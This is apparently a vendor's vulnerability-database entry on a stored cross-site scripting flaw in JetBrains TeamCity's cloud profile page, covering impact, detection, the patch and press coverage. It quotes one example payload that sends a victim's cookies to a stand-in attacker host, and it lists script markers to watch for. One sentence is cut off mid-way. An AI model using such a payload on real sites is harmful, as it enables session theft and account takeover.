
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-59794 is a stored Cross-Site Scripting (XSS) vulnerability in JetBrains TeamCity affecting all versions before 2026.1.2. The flaw exists on the cloud profile page, where agent-reported data is not properly sanitized before being rendered, allowing an authenticated attacker to inject persistent malicious scripts. It was published on July 10, 2026. The CVSS v3.1 base score is reported as 5.4 (Medium) by NVD and 7.3 (High) by the GitHub Advisory Database, reflecting differing scope assessments (GitHub Advisory, JetBrains).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated user with low privileges can submit malicious script payloads through agent-reported data, which TeamCity stores and subsequently renders unsanitized on the cloud profile page. When another user (potentially an administrator) visits the cloud profile page, the stored payload executes in their browser context. Exploitation requires network access, low privileges, and victim user interaction (page visit), but no special configuration (GitHub Advisory, JetBrains).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the affected cloud profile page, including administrators. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims, and manipulation of page content. While availability is not directly impacted, the confidentiality and integrity risks are significant — particularly if an administrator's session is hijacked, potentially enabling further compromise of the TeamCity environment (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) through the agent reporting interface.<script>, javascript:, onerror=) in agent-reported data fields associated with cloud profile pages.JetBrains has released a patch in TeamCity version 2026.1.2, which resolves this vulnerability. All users running TeamCity versions prior to 2026.1.2 should upgrade immediately. As interim mitigations, administrators should implement Content Security Policy (CSP) headers to limit the impact of any XSS execution, and restrict which users or agents have the ability to submit agent-reported data. Reviewing and auditing existing agent-reported data for suspicious content is also recommended (JetBrains, GitHub Advisory).
Several security news outlets covered this vulnerability as part of a broader JetBrains patch release addressing six vulnerabilities across TeamCity, YouTrack, and IntelliJ IDEA. Coverage appeared on GBHackers, CyberSecurityNews, SecurityOnline, HealSecurity, and VPNcentral, generally framing the issue as a moderate-severity flaw requiring prompt patching. No notable independent researcher commentary or significant social media discussion specific to this CVE has been identified beyond standard vulnerability aggregation (GBHackers, CyberSecurityNews, VPNcentral).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."